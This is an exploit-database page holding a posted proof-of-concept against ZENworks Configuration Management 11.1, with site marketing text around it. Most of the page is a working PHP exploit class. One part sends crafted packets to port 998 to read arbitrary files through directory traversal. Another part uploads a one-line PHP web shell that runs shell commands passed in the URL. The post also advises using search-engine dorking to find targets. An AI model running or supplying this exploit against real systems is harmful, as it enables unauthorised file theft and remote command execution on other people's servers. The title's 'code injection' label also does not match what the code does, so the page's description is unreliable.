Vulners
Lucene search
ZENworks Configuration Management 11.1 Shell Upload
=============================================================================================================================================
| # Title : ZENworks Configuration Management 11.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.opentext.com/products/zenworks-suite |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: A custom packet is sent to port 998 to get a specific file from the file system. I have added comments in the code to explain the main operations.
Support for all operating systems and the ability to upload a web shell to the code. Now you can use the uploadWebShell function to upload a web shell to the desired path
[+] save code as poc.php.
[+] Set Target : line 84
[+] USage : php poc.php
[+] PayLoad :
<?php
class NovellZenworksExploit {
private $ip;
private $port;
private $filePath;
private $depth;
public function __construct($ip, $port = 998, $filePath = '\\WINDOWS\\system32\\drivers\\etc\\hosts', $depth = 6) {
$this->ip = $ip;
$this->port = $port;
$this->filePath = $filePath;
$this->depth = $depth;
}
public function exploit() {
if (empty($this->filePath)) {
echo "Please supply the name of the file you want to download\n";
return;
}
$travs = str_repeat("\\..", $this->depth);
if ($this->filePath[0] !== "\\") {
$travs .= "\\";
}
$travs .= $this->filePath;
$payload = mb_convert_encoding($travs, 'UTF-16LE');
$packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload;
$sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5);
if (!$sock) {
echo "Connection failed: $errstr ($errno)\n";
return;
}
fwrite($sock, $packet);
fread($sock, 4); // Ignore first 4 bytes
$lengthData = fread($sock, 4);
if (!$lengthData) {
echo "Unable to get length due to a timeout\n";
fclose($sock);
return;
}
fread($sock, 0x210 - 8); // Skip unnecessary data
$length = unpack("V", $lengthData)[1];
$contents = fread($sock, $length);
if (!$contents) {
echo "Unable to extract contents due to a timeout\n";
fclose($sock);
return;
}
fclose($sock);
echo "File retrieved successfully!\n";
$fname = basename($this->filePath);
file_put_contents($fname, $contents);
echo "File saved in: $fname\n";
}
public function uploadWebShell($shellContent, $destination = '/var/www/html/shell.php') {
$sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5);
if (!$sock) {
echo "Connection failed: $errstr ($errno)\n";
return;
}
$payload = mb_convert_encoding($destination, 'UTF-16LE');
$packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload;
$packet .= mb_convert_encoding($shellContent, 'UTF-16LE');
fwrite($sock, $packet);
fclose($sock);
echo "Web shell uploaded successfully at: $destination\n";
}
}
// مثال على الاستخدام
$exploit = new NovellZenworksExploit('192.168.1.1');
$exploit->exploit();
// رفع ويب شل
$shell = "<?php system(\$_GET['cmd']); ?>";
$exploit->uploadWebShell($shell, '/var/www/html/shell.php');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinxData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Mar 2025 00:00Current
7.5High risk
Vulners AI Score7.5